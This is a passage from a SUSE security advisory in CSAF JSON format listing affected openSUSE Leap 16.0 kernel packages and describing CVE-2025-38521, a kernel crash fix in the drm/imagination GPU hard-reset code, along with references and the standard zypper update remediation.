"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38520"
},
{
"cve": "CVE-2025-38521",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38521"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/imagination: Fix kernel crash when hard resetting the GPU\n\nThe GPU hard reset sequence calls pm_runtime_force_suspend() and\npm_runtime_force_resume(), which according to their documentation should\nonly be used during system-wide PM transitions to sleep states.\n\nThe main issue though is that depending on some internal runtime PM\nstate as seen by pm_runtime_force_suspend() (whether the usage count is\n\u003c= 1), pm_runtime_force_resume() might not resume the device unless\nneeded. If that happens, the runtime PM resume callback\npvr_power_device_resume() is not called, the GPU clocks are not\nre-enabled, and the kernel crashes on the next attempt to access GPU\nregisters as part of the power-on sequence.\n\nReplace calls to pm_runtime_force_suspend() and\npm_runtime_force_resume() with direct calls to the driver\u0027s runtime PM\ncallbacks, pvr_power_device_suspend() and pvr_power_device_resume(),\nto ensure clocks are re-enabled and avoid the kernel crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38521",
"url": "https://www.suse.com/security/cve/CVE-2025-38521"
},
{
"category": "external",
"summary": "SUSE Bug 1248232 for CVE-2025-38521",
"url": "https://bugzilla.suse.com/1248232"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
